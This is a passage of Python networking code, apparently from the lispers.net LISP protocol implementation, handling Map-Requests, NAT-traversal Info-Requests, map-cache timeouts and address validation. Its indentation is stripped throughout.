# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Do we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
